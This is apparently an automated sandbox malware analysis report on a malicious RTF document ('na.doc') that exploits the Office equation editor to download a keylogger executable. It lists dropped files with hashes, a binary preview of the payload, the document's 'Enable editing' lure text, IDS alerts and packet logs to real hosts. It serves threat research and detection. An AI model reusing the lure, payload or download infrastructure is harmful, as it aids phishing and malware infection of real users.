                                                                                                          ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeGet hashmaliciousCryptOne, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 132.226.247.73
                                                                                                          rShippingDocuments240384.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 132.226.247.73
                                                                                                          Bill Of Lading.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 132.226.247.73
                                                                                                          SHARCOM-ASBGna.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 87.120.84.38
                                                                                                          zxalphamn.docGet hashmaliciousLokibotBrowse
                                                                                                          • 87.120.84.39
                                                                                                          Proforma Invoice347.docGet hashmaliciousNanocoreBrowse
                                                                                                          • 87.120.84.38
                                                                                                          Proforma-Invoice#018879TT0100..docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 87.120.84.38
                                                                                                          na.docGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 87.120.84.38
                                                                                                          na.docGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 87.120.84.38
                                                                                                          na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 87.120.84.38
                                                                                                          na.docGet hashmaliciousVIP KeyloggerBrowse
                                                                                                          • 87.120.84.38
                                                                                                          na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 87.120.84.38
                                                                                                          na.docGet hashmaliciousFormBookBrowse
                                                                                                          • 87.120.84.38

                                                                                                          JA3 Fingerprints

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          05af1f5ca1b87cc9cc9b25185115607dna.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 188.114.96.3
                                                                                                          PO.2407010.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                          • 188.114.96.3
                                                                                                          Po docs.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                          • 188.114.96.3
                                                                                                          Comprobante de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 188.114.96.3
                                                                                                          AWB-M09CT560.docx.docGet hashmaliciousUnknownBrowse
                                                                                                          • 188.114.96.3
                                                                                                          0001.xlsGet hashmaliciousRemcosBrowse
                                                                                                          • 188.114.96.3
                                                                                                          1.rtfGet hashmaliciousRemcosBrowse
                                                                                                          • 188.114.96.3
                                                                                                          ingswhic.docGet hashmaliciousRemcosBrowse
                                                                                                          • 188.114.96.3
                                                                                                          swithnew.docGet hashmaliciousRemcosBrowse
                                                                                                          • 188.114.96.3
                                                                                                          Swift Copy.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                          • 188.114.96.3
                                                                                                          36f7277af969a6947a61ae0b815907a1na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          Proforma-Invoice#018879TT0100..docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          na.docGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 149.154.167.220
                                                                                                          na.docGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          mnobizxv.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          REVISED INVOICE.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          CLOSURE.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          BL Packing List & Invoice.xlsGet hashmaliciousUnknownBrowse
                                                                                                          • 149.154.167.220

                                                                                                          Dropped Files

                                                                                                          No context

                                                                                                          Created / dropped Files

                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                          Download File
                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):64
                                                                                                          Entropy (8bit):0.34726597513537405
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Nlll:Nll
                                                                                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                          Malicious:false
                                                                                                          Reputation:high, very likely benign file
                                                                                                          Preview:@...e...........................................................

                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\qHbynE8Vgwabsy3[1].exe

                                                                                                          Download File
                                                                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):787968
                                                                                                          Entropy (8bit):7.706822105480993
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:xYyLre2zSoe7IAf7r1wqJnwQEHDpBcUUOaUh3RadG4rIebdySybB7hGYrFTk9:+5ovAf9rnu/BUOaUh3krJGFhGAW9
                                                                                                          MD5:879B4E39A671B826E59EE54A75714CC7
                                                                                                          SHA1:996E3EBD99743215F28FB59BC7940B376140C298
                                                                                                          SHA-256:35FE6053D71A6E8EE7FBBB9BC7E6B0F1F40512F567E64B074FB5CDD3D246C219
                                                                                                          SHA-512:15B5FEEAC3C870DE154E14E7BFCA475EFEB7E24B7AC643AD3059FEAE32BC8810CEA56687CA568105AC34D3EA84656546AE5DF29967654529C7E20C7DA9A0B1C1
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                          • Antivirus: ReversingLabs, Detection: 67%
                                                                                                          Reputation:low
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...2`................0.............*.... ... ....@.. .......................`............@.....................................O.... .......................@..........p............................................ ............... ..H............text...0.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H........u...i......^...@................................................0...........(........(....}.......&....*....................0............{.....+..*.0..%..........{.....o....(.......&.r...ps....z.*....................0..)...........(......,...(....}......{.......&....*..........."#.......0..E..........{......o .......{....(......,...(....}.....{........{.......&....*...........>?.......0...........s!......b...%..,...(....rO..p~....("...s#....+|..o$......o%.......(...+

                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{B6063544-FDF7-4FBD-8A15-24893FB13E99}.tmp

                                                                                                          Download File
                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):16384
                                                                                                          Entropy (8bit):0.0
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3::
                                                                                                          MD5:CE338FE6899778AACFC28414F2D9498B
                                                                                                          SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
                                                                                                          SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
                                                                                                          SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
                                                                                                          Malicious:false
                                                                                                          Reputation:high, very likely benign file
                                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{33093E2E-7874-42A3-ADE6-D846D0081D97}.tmp

                                                                                                          Download File
                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1886720
                                                                                                          Entropy (8bit):3.3964766189950852
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:pyemryemryemryemryemryemryemryemryemryemryemryemryemryemryemryea:UA
                                                                                                          MD5:13F489D240B262F674D1E074C6290FCF
                                                                                                          SHA1:3D45281E728018F8CC09AF5D2A070F72F87B3B04
                                                                                                          SHA-256:5692C0213670C4440BE4F0A50878053A58A9530BBA37E278FABCB9745568D5B4
                                                                                                          SHA-512:806A415E3551F6E9CBAD87B20A3FE16C5233B3DCAA85918454AFE62C6FA6549E603EB341440E854352AC8542B943DBE29D35A1B5758B468F6DDB90C41D96C5E4
                                                                                                          Malicious:false
                                                                                                          Preview:7.5.0.2.1.7.0.3.p.l.e.a.s.e. .c.l.i.c.k. .E.n.a.b.l.e. .e.d.i.t.i.n.g. .f.r.o.m. .t.h.e. .y.e.l.l.o.w. .b.a.r. .a.b.o.v.e...T.h.e. .i.n.d.e.p.e.n.d.e.n.t. .a.u.d.i.t.o.r.s.. .o.p.i.n.i.o.n. .s.a.y.s. .t.h.e. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s. .a.r.e. .f.a.i.r.l.y. .s.t.a.t.e.d. .i.n. .a.c.c.o.r.d.a.n.c.e. .w.i.t.h. .t.h.e. .b.a.s.i.s. .o.f. .a.c.c.o.u.n.t.i.n.g. .u.s.e.d. .b.y. .y.o.u.r. .o.r.g.a.n.i.z.a.t.i.o.n... .S.o. .w.h.y. .a.r.e. .t.h.e. .a.u.d.i.t.o.r.s. .g.i.v.i.n.g. .y.o.u. .t.h.a.t. .o.t.h.e.r. .l.e.t.t.e.r. .I.n. .a.n. .a.u.d.i.t. .o.f. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s.,. .p.r.o.f.e.s.s.i.o.n.a.l. .s.t.a.n.d.a.r.d.s. .r.e.q.u.i.r.e. .t.h.a.t. .a.u.d.i.t.o.r.s. .o.b.t.a.i.n. .a.n. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .t.h.e. .e.x.t.e.n.t. .n.e.c.e.s.s.a.r.y. .t.o. .p.l.a.n. .t.h.e. .a.u.d.i.t... .A.u.d.i.t.o.r.s. .u.s.e. .t.h.i.s. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .a.s.s.e.s.s. .

                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{43F85D21-FB19-4970-BAE8-FD03AD5FEB6A}.tmp

                                                                                                          Download File
                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1536
                                                                                                          Entropy (8bit):1.354265440522515
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbk:IiiiiiiiiifdLloZQc8++lsJe1MzH
                                                                                                          MD5:F90E9BBACA2635406674FD02695B6C96
                                                                                                          SHA1:25140CEDE9A7773F8C5986370CD912D5BE6400C7
                                                                                                          SHA-256:EEA2A3D997A33D6B1F4BA4EA67F2B5AC2C00090E784732688149818883D1AAF0
                                                                                                          SHA-512:68E5AF482C50C9C4B3961B4FAED162BFBA8445D8F3E8FE468393C8AD2EC2B44C7E00C2BB377D942477F582060D45D85A5BBBFF50DCFFE13C8C652FF7E713F268
                                                                                                          Malicious:false
                                                                                                          Preview:..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{EA9386F2-5C34-4EE8-9432-0E98A6485B50}.tmp

                                                                                                          Download File
                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1024
                                                                                                          Entropy (8bit):0.05390218305374581
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:ol3lYdn:4Wn
                                                                                                          MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                          SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                          SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                          SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                          Malicious:false
                                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                          C:\Users\user\AppData\Local\Temp\eyd3ngwl.gvi.psm1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:very short file (no magic)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1
                                                                                                          Entropy (8bit):0.0
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:U:U
                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                          Malicious:false
                                                                                                          Preview:1

                                                                                                          C:\Users\user\AppData\Local\Temp\rt4c5fsc.rny.ps1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:very short file (no magic)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1
                                                                                                          Entropy (8bit):0.0
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:U:U
                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                          Malicious:false
                                                                                                          Preview:1

                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                                                                          Download File
                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                          File Type:Generic INItialization configuration [folders]
                                                                                                          Category:dropped
                                                                                                          Size (bytes):38
                                                                                                          Entropy (8bit):4.195295934496219
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:M19m42Uv:M9
                                                                                                          MD5:85AFAECA1F119568BFA70BB4ED76F108
                                                                                                          SHA1:13DA0EB4D0361D0A4CD1DD38DBECA56DEB273457
                                                                                                          SHA-256:3211DF2212BAF22DF462140F37EC16A81483BFB4DE4796F24A0708390601F0F8
                                                                                                          SHA-512:4E5C577D753BF15471DA27D3EEE34FCE86E388414FA1177E3BCF877827C82750F23C8EDB64B83CF7E55C69D5FCB2BD18941E81A353F8458A0685D358C1E9D3A6
                                                                                                          Malicious:false
                                                                                                          Preview:[doc]..na.LNK=0..[folders]..na.LNK=0..

                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\na.LNK

                                                                                                          Download File
                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:05 2023, mtime=Fri Aug 11 15:42:05 2023, atime=Wed Oct 30 06:19:35 2024, length=1838683, window=hide
                                                                                                          Category:dropped
                                                                                                          Size (bytes):968
                                                                                                          Entropy (8bit):4.49250081222583
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:88djE0gXg/XAlCPCHaXYKB4bB/Dr8xX+WWLF9OmicvbZ1LI8DtZ3YilMMEpxRljK:88d4k/XTZWxOG9ae11LDDv3qt57u
                                                                                                          MD5:276A4CCD4D119BBE21A5692B55DD5424
                                                                                                          SHA1:44EB40EC7F18475C9A9177191E89FCC5B4F8C464
                                                                                                          SHA-256:56B1D9154A28B6EB6B4530285155E3BDDE7E40D018932931122123F9E96DE543
                                                                                                          SHA-512:A982D148FA2982C512ED5E387DBB445CB3216BB4878B2694F6690DE4086D35ADD331F18754D15D78820EE1822574869A9A38C90D587B3C3A76F53012A69B1D27
                                                                                                          Malicious:false
                                                                                                          Preview:L..................F.... ....?..r....?..r...D....*..[............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....^Yp:..user.8......QK.X^Yp:*...&=....U...............A.l.b.u.s.....z.1......WD...Desktop.d......QK.X.WD.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....P.2.[...^Yr: .na.doc..:.......WC..WC.*.........................n.a...d.o.c.......p...............-...8...[............?J......C:\Users\..#...................\\960781\Users.user\Desktop\na.doc.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.n.a...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......960781..........D_....3N...W...9..W.e8...8.....[D_....3N...W...9..W.e8...8.....[....

                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                                                                                          Download File
                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):162
                                                                                                          Entropy (8bit):2.4797606462020307
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:vrJlaCkWtVyxblgl0nGltlMWtVGXlcNOllln:vdsCkWtMe2G/LkXh/l
                                                                                                          MD5:89AFCB26CA4D4A770472A95DF4A52BA8
                                                                                                          SHA1:C3B3FEAEF38C3071AC81BC6A32242E6C39BEE9B5
                                                                                                          SHA-256:EF0F4A287E5375B5BFFAE39536E50FDAE97CD185C0F7892C7D25BD733E7D2F17
                                                                                                          SHA-512:EA44D55E57AEFA8D6F586F144CB982145384F681D0391C5AD8E616A67D77913152DB7B0F927E57CDA3D1ECEC3D343A1D6E060EAFF8E8FEDBE38394DFED8224CC
                                                                                                          Malicious:false
                                                                                                          Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

                                                                                                          Download File
                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2
                                                                                                          Entropy (8bit):1.0
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Qn:Qn
                                                                                                          MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                          SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                          SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                          SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                          Malicious:false
                                                                                                          Preview:..

                                                                                                          C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe

                                                                                                          Download File
                                                                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):787968
                                                                                                          Entropy (8bit):7.706822105480993
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:xYyLre2zSoe7IAf7r1wqJnwQEHDpBcUUOaUh3RadG4rIebdySybB7hGYrFTk9:+5ovAf9rnu/BUOaUh3krJGFhGAW9
                                                                                                          MD5:879B4E39A671B826E59EE54A75714CC7
                                                                                                          SHA1:996E3EBD99743215F28FB59BC7940B376140C298
                                                                                                          SHA-256:35FE6053D71A6E8EE7FBBB9BC7E6B0F1F40512F567E64B074FB5CDD3D246C219
                                                                                                          SHA-512:15B5FEEAC3C870DE154E14E7BFCA475EFEB7E24B7AC643AD3059FEAE32BC8810CEA56687CA568105AC34D3EA84656546AE5DF29967654529C7E20C7DA9A0B1C1
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                          • Antivirus: ReversingLabs, Detection: 67%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...2`................0.............*.... ... ....@.. .......................`............@.....................................O.... .......................@..........p............................................ ............... ..H............text...0.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H........u...i......^...@................................................0...........(........(....}.......&....*....................0............{.....+..*.0..%..........{.....o....(.......&.r...ps....z.*....................0..)...........(......,...(....}......{.......&....*..........."#.......0..E..........{......o .......{....(......,...(....}.....{........{.......&....*...........>?.......0...........s!......b...%..,...(....rO..p~....("...s#....+|..o$......o%.......(...+

                                                                                                          C:\Users\user\Desktop\~$na.doc

                                                                                                          Download File
                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):162
                                                                                                          Entropy (8bit):2.4797606462020307
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:vrJlaCkWtVyxblgl0nGltlMWtVGXlcNOllln:vdsCkWtMe2G/LkXh/l
                                                                                                          MD5:89AFCB26CA4D4A770472A95DF4A52BA8
                                                                                                          SHA1:C3B3FEAEF38C3071AC81BC6A32242E6C39BEE9B5
                                                                                                          SHA-256:EF0F4A287E5375B5BFFAE39536E50FDAE97CD185C0F7892C7D25BD733E7D2F17
                                                                                                          SHA-512:EA44D55E57AEFA8D6F586F144CB982145384F681D0391C5AD8E616A67D77913152DB7B0F927E57CDA3D1ECEC3D343A1D6E060EAFF8E8FEDBE38394DFED8224CC
                                                                                                          Malicious:true
                                                                                                          Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                                                                          Static File Info

                                                                                                          General

                                                                                                          File type:Nim source code, Non-ISO extended-ASCII text, with very long lines (65336), with CR line terminators
                                                                                                          Entropy (8bit):4.3024711324840075
                                                                                                          TrID:
                                                                                                          • Rich Text Format (4004/1) 100.00%
                                                                                                          File name:na.doc
                                                                                                          File size:1'838'683 bytes
                                                                                                          MD5:657e7d38172b5294be8ff81a94efe745
                                                                                                          SHA1:e00cce89c60742889474451b7306ac6bd3c80430
                                                                                                          SHA256:89054ad8d24c60063c31b9c2deede4c43b6a6a84da9f657b3450a4c2346c03e3
                                                                                                          SHA512:288088e6cc702c845ce73d0bac85c014bd688c860313463146ac7acb597bc9e3c2c99261682e52a6202be3a922af32cea3e8d275142dc80108aaf67379a6d629
                                                                                                          SSDEEP:6144:uwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAA:b
                                                                                                          TLSH:9885922DD34B02598F620377AB571E5142BDBA7EF38552A1302C537933EAC3DA1252BE
                                                                                                          File Content Preview:{\rt..{\*\1LDUe81hMKlnPP1nKASZ19ZOKBqddO2quFmxo0MtEKrExBRHcyxLvwjB2nisPdhka10eXQHX0tX9IpV6AHD55BqRb7ksA8oUyv56EBTeaHx5p8rIsMNMvdWCvP68Lg47yF8qJ2ZIsmHayr9seVbhq6RTvxvEJ25fUHKOBnETngf98o4sNz3cFMGJT2O}..{\175021703please click Enable editing from the yellow

                                                                                                          File Icon

                                                                                                          Icon Hash:2764a3aaaeb7bdbf

                                                                                                          Network Behavior

                                                                                                          Suricata IDS Alerts

                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                          2024-10-30T08:19:41.177030+01002022050ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1187.120.84.3880192.168.2.2249161TCP
                                                                                                          2024-10-30T08:19:41.359672+01002022051ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2187.120.84.3880192.168.2.2249161TCP
                                                                                                          2024-10-30T08:19:47.874537+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.2249162132.226.8.16980TCP
                                                                                                          2024-10-30T08:19:50.122483+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.2249162132.226.8.16980TCP
                                                                                                          2024-10-30T08:19:50.707109+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.2249164188.114.96.3443TCP
                                                                                                          2024-10-30T08:19:52.660592+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.2249165132.226.8.16980TCP
                                                                                                          2024-10-30T08:19:54.501299+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.2249167132.226.8.16980TCP
                                                                                                          2024-10-30T08:19:55.083249+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.2249168188.114.97.3443TCP
                                                                                                          2024-10-30T08:19:56.949439+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.2249170188.114.97.3443TCP
                                                                                                          2024-10-30T08:19:58.455619+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.2249172188.114.96.3443TCP
                                                                                                          2024-10-30T08:20:15.045474+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.2249179188.114.96.3443TCP

                                                                                                          Network Port Distribution

                                                                                                          TCP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Oct 30, 2024 08:19:40.214869022 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:40.220623016 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:40.220705032 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:40.220944881 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:40.226921082 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.176788092 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.176856995 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.176894903 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.176928997 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.176963091 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.176996946 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.177006960 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.177006960 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.177006960 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.177030087 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.177041054 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.177063942 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.177098989 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.177104950 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.177154064 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.177198887 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.181750059 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.182532072 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.182559967 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.182596922 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.182658911 CET804916187.120.84.38192.168.2.22
